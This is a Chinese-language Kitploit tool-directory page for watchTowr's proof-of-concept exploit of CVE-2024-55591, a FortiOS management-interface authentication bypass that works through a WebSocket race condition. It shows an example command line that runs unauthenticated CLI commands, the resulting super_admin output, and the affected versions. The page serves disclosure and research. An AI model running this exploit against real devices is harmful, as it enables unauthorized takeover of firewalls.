Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
fortios-auth-bypass-poc-CVE-2024-55591 — 针对CVE-2024-55591的概念验证利用,演示通过WebSocket竞态条件绕过FortiOS管理接口的身份验证,以未认证方式执行CLI命令。 | Kitploit
工具/GitHubGitHub/watchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制身份验证红队
GitHubwatchtowrlabs/fortios-auth-bypass-poc-cve-2024-55591

fortios-auth-bypass-poc-CVE-2024-55591

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

针对CVE-2024-55591的概念验证利用,演示通过WebSocket竞态条件绕过FortiOS管理接口的身份验证,以未认证方式执行CLI命令。

查看仓库
771941年前Kitploit 审核通过
分享

CVE-2024-55591

一款用于 Fortinet FortiOS 身份验证绕过的概念验证工具

查看我们的博客文章以获取技术细节

检测实战

root@kitploit:~
python CVE-2024-55591-PoC.py --host 192.168.1.5 --port 443 --command "get system status" --user watchTowr --ssl
             __         ___  ___________                   
     __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
     \ \/ \/ \__  \    ___/ ___\|  |  \\|    | /  _ \ \/ \/ \_  __ \
      \     / / __ \|  | \  \\___|   Y  |    |(  <_> \     / |  | \
       \/\_/ (____  |__|  \\\\___  |___|__|__  | \\__  / \\/\_/  |__|   
                  \\          \\     \\                              

        CVE-2024-55591.py
        (*) Fortinet FortiOS 身份验证绕过 (CVE-2024-55591) 概念验证工具,由 watchTowr 开发
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-55591]

[*] 检查目标是否为 FortiOS 管理界面
[*] 目标确认为 FortiOS 管理界面
[*] 目标确认存在漏洞 CVE-2024-55591,正在执行利用
来自服务器的输出:�m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337

来自服务器的输出:�
get system status

来自服务器的输出:�~�FAKESERIAL # "Local_Process_Access" "Local_Process_Access" "root" "" "" "none" [x.x.x.x]:54546 [x.x.x.x]:443
Unknown action 0

FAKESERIAL # 
FAKESERIAL # get system status
Version: FortiGate-VM64-AWS v7.0.16,build0667,241001 (GA.M)
Security Level: High
Firmware Signature: certified
Virus-DB: 1.00000(2018-04-09 18:07)

描述

此脚本是 CVE-2024-55591 的概念验证工具,针对 FortiOS(Fortigate)管理界面。通过暴力建立 WebSocket 连接以制造竞争条件,并结合身份验证绕过,可以在未经身份验证的情况下发送 FortiOS CLI 命令。更多细节请参见我们的博客文章。

受影响版本

  • FortiOS 7.0.0 至 7.0.16
  • FortiProxy 7.0.0 至 7.0.19
  • FortiProxy 7.2.0 至 7.2.12

更多详情请参见 Fortinet 安全公告

注意

此脚本不设计用于 FortiProxy,因为预检检查会判断目标是否为 FortiGate 管理界面,但推测底层技术同样适用于受影响的 FortiProxy 设备。

关注 watchTowr 实验室

获取最新安全研究,请关注 watchTowr 实验室团队

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
下载工具